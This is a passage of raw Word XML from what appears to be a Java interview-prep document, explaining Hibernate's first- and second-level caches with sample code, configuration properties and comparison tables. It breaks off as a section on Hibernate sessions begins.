            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54324FF1"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2931AE94"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Default for every Hibernate session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="55A5BDA5" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED87213"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cond-Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="509D4940"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Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D0FE9F3"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="268EF6FB"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hared entities across sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="03C508C1" w14:textId="77777777" w:rsidTr="00102B4C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52694133"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 Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF72EB3"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Factory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67C75574"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65262778"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For expensive, frequently run queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38ED85A4" w14:textId="77777777" w:rsidR="00102B4C" w:rsidRPr="007F3379" w:rsidRDefault="00102B4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Hibernate caching improves efficiency and scalability by reducing DB access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4332A76D" w14:textId="415F0022" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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98BC05A">
          <v:rect id="_x0000_i2411" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F1908" w14:textId="41B64BB3" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="545" w:name="_Toc196308025"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain L1 and L2 cache in Hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="545"/>
    </w:p>
    <w:p w14:paraId="157A1D46" w14:textId="2C0F1C5D" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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L1 (First-Level) Cache and L2 (Second-Level) Cache in Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1B4BD" w14:textId="77777777" w:rsidR="00695A14"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58711E">
          <v:rect id="_x0000_i2412" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F73E1" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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L1 Cache (First-Level Cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D4193" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1974"/>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Scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hibernate </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D97F25" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1974"/>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Enabled by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEF60A4" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1974"/>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aches entities within the same session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B683D" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1974"/>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Not shared across sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BAE53F" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1974"/>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lastRenderedPageBreak/>
        <w:t>Automatically manages lifecycle with the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF969BE" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A7F49" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D1BE27" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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mployee e1 = session.get(Employee.class, 101); // Hits DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0078C593" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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mployee e2 = session.get(Employee.class, 101); // From L1 cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34403EFE" w14:textId="77777777" w:rsidR="00695A14"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0F852EE">
          <v:rect id="_x0000_i2413" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBD5EA8" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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L2 Cache (Second-Level Cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE523D8" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hibernate </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CD844" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Not enabled by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721931A" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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hared across multiple sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E152396" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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Requires external cache provider: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ehcache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Infinispan</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hazelcast</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0314D9" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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To enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D439D21" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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hibernate.cache.use_second_level_cache=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EFBBBB" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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hibernate.cache.region.factory_class=org.hibernate.cache.ehcache.EhCacheRegionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2901A603" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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Entity setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A99F5" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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ntity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C010FD1" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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ache(usage = CacheConcurrencyStrategy.READ_ONLY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8872A" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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ublic class Employee { ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF61F9E" w14:textId="77777777" w:rsidR="00695A14"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19255CC">
          <v:rect id="_x0000_i2414" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F279D35" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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7"/>
        <w:gridCol w:w="2457"/>
        <w:gridCol w:w="2305"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="20B558BC" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DC6C58E" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D95C77A" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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L1 Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56128CEE" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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L2 Cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="18D1F04C" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6819E8B4" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45013B60" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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er Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B4FA0A0" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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er SessionFactory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3A7BA345" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48FC42BD" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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nabled by Default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1099302B" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD99D7D" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="40049EAC" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34336642" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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haring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E6C3CD" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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No (session-local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59F2506F" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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Yes (across sessions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="27DF6F21" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C47F8FD" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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onfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4027C6D8" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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Not needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51042A81" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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Needs manual setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="596612E7" w14:textId="77777777" w:rsidTr="00695A14">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B71DC7" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28FE3E80" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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Repeated access in session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB07ADC" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A1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Reduce DB hits app-wide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BEFFE9C" w14:textId="77777777" w:rsidR="00695A14"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5F224C9">
          <v:rect id="_x0000_i2415" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01078696" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2C8CA" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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1 is session-scoped and automatic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DABE1" w14:textId="77777777" w:rsidR="00695A14" w:rsidRPr="007F3379" w:rsidRDefault="00695A14" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197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2 is global-scoped and optional, used for better performance and scalability in large applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57414862" w14:textId="3F78CCCD" w:rsidR="00C97E60" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EA292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009B52F">
          <v:rect id="_x0000_i2416" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D91B4" w14:textId="3C8CEEDC" w:rsidR="006764D9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D60772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="546" w:name="_Toc196308026"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the hibernate sessions</w:t>
      </w:r>
      <w:r w:rsidR="006764D9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="546"/>
    </w:p>
    <w:p w14:paraId="7322C91C" w14:textId="7D0E04B0" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Hibernate, a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the primary interface used to interact with the database. It represents a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single unit of work</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the database and acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wrapper around JDBC connections</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A23AC" w14:textId="77777777" w:rsidR="00726D4F"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27EAD7A">
          <v:rect id="_x0000_i2417" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06873190" w14:textId="77777777" w:rsidR="00726D4F" w:rsidRPr="007F3379" w:rsidRDefault="00726D4F"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Key Points About Hibernate Session:</w:t>
      </w:r>
    </w:p>
